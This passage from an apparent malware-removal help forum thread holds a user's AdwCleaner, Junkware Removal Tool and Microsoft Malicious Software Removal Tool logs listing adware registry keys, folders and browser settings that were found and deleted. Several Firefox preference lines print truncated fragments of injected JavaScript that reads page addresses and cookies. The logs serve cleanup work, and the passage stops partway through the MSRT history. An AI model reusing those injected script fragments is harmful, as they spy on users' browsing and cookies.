Key Found : HKLM\SOFTWARE\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
Key Found : HKLM\SOFTWARE\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Found : HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Found : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
Key Found : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Key Found : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Found : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Key Found : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Found : HKLM\SOFTWARE\Classes\CLSID\{0fd6c4b3-4875-4446-9ebc-e51179d7abe9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1C950DE5-D31E-42FB-AFB9-91B0161633D8}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A9A56B8E-2DEB-4ED3-BC92-1FA450BCE1A5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE338F6D-5A7C-4D1D-86E3-C618532079B5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B7FD68F7-D28B-431E-9EE8-E45D915B7F17}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BC7E25D7-4681-46A3-AF5A-9A1B865783ED}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C339D489-FABC-41DD-B39D-276101667C70}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{CBBEA4B9-B183-47AC-8B1F-FD526AC99A8D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D89031C2-10DA-4C90-9A62-FCED012BC46B}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E0C3A839-0E5E-4EBC-9F8F-E56F8FC732CE}
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin.1
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio.1
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin.1
Key Found : HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Found : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Found : HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Found : HKLM\SOFTWARE\Classes\Interface\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Found : HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Found : HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Found : HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbRequest
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbRequest.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbTask
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbTask.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper
Key Found : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar.CT3196716
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{74C02D12-FAEE-4834-80D2-5B7D2480AD61}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E3CDDB72-3ADC-4920-B42B-68A8C29FA942}
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\InstallCore
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{701F5C41-BB30-46DA-A56B-68784B0B762B}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B975A0-F679-444E-9D94-6D292FA53140}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D97143C2-4282-496B-BDC4-7EC852F1497C}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0C3A839-0E5E-4EBC-9F8F-E56F8FC732CE}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{0fd6c4b3-4875-4446-9ebc-e51179d7abe9}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{BC7E25D7-4681-46A3-AF5A-9A1B865783ED}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{CBBEA4B9-B183-47AC-8B1F-FD526AC99A8D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FromDocToPDF_65bar Uninstall Internet Explorer
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D97143C2-4282-496B-BDC4-7EC852F1497C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5AA24EA-11B8-4113-95AE-9ED71DEAF12A}
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}]

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v35.0 (x86 en-US)

[7rgneeol.default] - Line Found : user_pref("extensions.FXNqB.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumoro[...]
[7rgneeol.default] - Line Found : user_pref("extensions.VDIQKPIG4.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.aflt", "dsites");
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.cd", "2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDt[...]
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.cr", "1308762248");
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.instlRef", "0211_e");
[7rgneeol.default] - Line Found : user_pref("extensions.q5lnQceM.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sum[...]
[7rgneeol.default] - Line Found : user_pref("extensions.uAk3as.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userBornDate", "3230313430343238");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userBornDate.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userId",

"64333531636537372D623135652D343266622D396364332D633636653163363162376133");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userId.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_user_approval_interacted", "");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_user_approval_interacted.storedInFile",

false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.url_history0001.storedInFile", true);

*************************

AdwCleaner[R0].txt - [26023 octets] - [21/01/2015 23:27:28]

########## EOF - \AdwCleaner\AdwCleaner[R0].txt - [26084 octets] ##########


And AdwCleaner[S0].txt
----------------------
# AdwCleaner v4.108 - Report created 21/01/2015 at 23:30:54
# Updated 17/01/2015 by Xplode
# Database : 2015-01-22.2 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Admin - LAWRENCE2
# Running from : C:\Users\Admin\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

  • Service Deleted : qknfd


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\caoupoNpEaK
Folder Deleted : C:\ProgramData\ClIckForSalie
Folder Deleted : C:\ProgramData\DiscounntLoCaatOr
Folder Deleted : C:\ProgramData\KinngCouupon
Folder Deleted : C:\ProgramData\PrinCECCoupon
Folder Deleted : C:\ProgramData\SalesMagnet
Folder Deleted : C:\ProgramData\SaoftiCoup
Folder Deleted : C:\ProgramData\saveron
Folder Deleted : C:\ProgramData\2fcd61ef531c55b0
Folder Deleted : C:\ProgramData\3444516970527741360
Folder Deleted : C:\Program Files (x86)\Conduit
Folder Deleted : C:\Program Files (x86)\Optimizer Pro
Folder Deleted : C:\Program Files (x86)\saveron
Folder Deleted : C:\Windows\SysWOW64\SearchProtect
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Users\Bonnie\AppData\Local\Conduit
Folder Deleted : C:\Users\Bonnie\AppData\Local\iac
Folder Deleted : C:\Users\Bonnie\AppData\Local\NativeMessaging
Folder Deleted : C:\Users\Bonnie\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Bonnie\AppData\LocalLow\iac
Folder Deleted : C:\Users\Bonnie\AppData\LocalLow\Toolbar4
Folder Deleted : C:\Users\Bonnie\AppData\Roaming\DigitalSites
Folder Deleted : C:\Users\Bonnie\AppData\Roaming\ValueApps
Folder Deleted : C:\Users\Bonnie\Documents\Optimizer Pro
Folder Deleted : C:\Users\Bonnie\Documents\Updater
File Deleted : \END
File Deleted : C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\user.js

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin.1
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio.1
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbRequest
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbRequest.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbTask
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbTask.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager.1
Key Deleted : HKLM\SOFTWARE\Classes\.
Key Deleted : HKLM\SOFTWARE\Classes\..9
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3196716
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\InstallCore
Key Deleted : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FromDocToPDF_65bar Uninstall Internet Explorer
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v35.0 (x86 en-US)

[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.FXNqB.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\"sumoro[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.VDIQKPIG4.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\"su[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.aflt", "dsites");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.cd", "2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDt[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.cr", "1308762248");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.instlRef", "0211_e");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.q5lnQceM.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\"sum[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.uAk3as.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\"sumor[...]

*************************

AdwCleaner[R0].txt - [26259 octets] - [21/01/2015 23:27:28]
AdwCleaner[S0].txt - [27475 octets] - [21/01/2015 23:30:54]

########## EOF - \AdwCleaner\AdwCleaner[S0].txt - [27536 octets] ##########



#################################################################################################################
Junkware Removal Tool:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.1 (12.28.2014:1)
OS: Windows 7 Home Premium x64
Ran by Admin on Thu 01/22/2015 at 19:09:58.87
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360}



~~~ Files

Successfully deleted: [File] "C:\Windows\wininit.ini"



~~~ Folders



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 01/22/2015 at 19:13:05.63
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #7 on: January 22, 2015, 10:15:49 PM »
Part 3 (Microsoft's Malicious Software Removal Tool & ZOEK)
#################################################################################################################
Microsoft's Malicious Software Removal Tool:

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.15, December 2012
Started On Sat Dec 15 11:51:29 2012
->Scan ERROR: resource process://pid:3856 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Dec 15 11:53:11 2012


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.16, January 2013
Started On Thu Jan 10 03:02:54 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 10 03:04:22 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.17, February 2013
Started On Thu Feb 14 03:06:07 2013
->Scan ERROR: resource process://pid:2160 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Feb 14 03:10:39 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.18, March 2013
Started On Thu Mar 14 03:04:27 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Mar 14 03:05:59 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.19, April 2013
Started On Thu Apr 11 03:03:07 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Apr 11 03:05:05 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.20, May 2013
Started On Thu May 16 03:05:30 2013
->Scan ERROR: resource process://pid:5396 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu May 16 03:07:48 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.21, June 2013
Started On Thu Jun 13 03:02:49 2013
->Scan ERROR: resource process://pid:7492 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jun 13 03:04:52 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.22, July 2013
Started On Wed Jul 10 03:06:40 2013
->Scan ERROR: resource process://pid:1944 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 10 03:09:02 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.2, July 2013 (build 5.2.9201.0)
Started On Sun Jul 14 03:01:13 2013


Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Jul 14 03:03:53 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.3, August 2013 (build 5.3.9301.0)
Started On Thu Aug 15 03:02:19 2013


Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Aug 15 03:04:21 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.4, September 2013 (build 5.4.9400.0)
Started On Thu Sep 12 03:08:19 2013

Engine: 1.1.9800.0
Signatures: 1.157.932.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Sep 12 03:11:27 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.5, October 2013 (build 5.5.9502.0)
Started On Wed Oct 09 03:05:24 2013

Engine: 1.1.9901.0
Signatures: 1.159.530.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Oct 09 03:08:02 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.6, November 2013 (build 5.6.9603.0)
Started On Wed Nov 13 03:03:27 2013

Engine: 1.1.10003.0
Signatures: 1.161.1618.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Nov 13 03:05:32 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.7, December 2013 (build 5.7.9701.0)
Started On Sun Dec 15 03:01:17 2013

Engine: 1.1.10100.0
Signatures: 1.163.1013.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Dec 15 03:03:52 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.8, January 2014 (build 5.8.9803.0)
Started On Thu Jan 16 03:01:29 2014

Engine: 1.1.10201.0
Signatures: 1.165.1273.0

Results Summary:
----------------
No infection found.
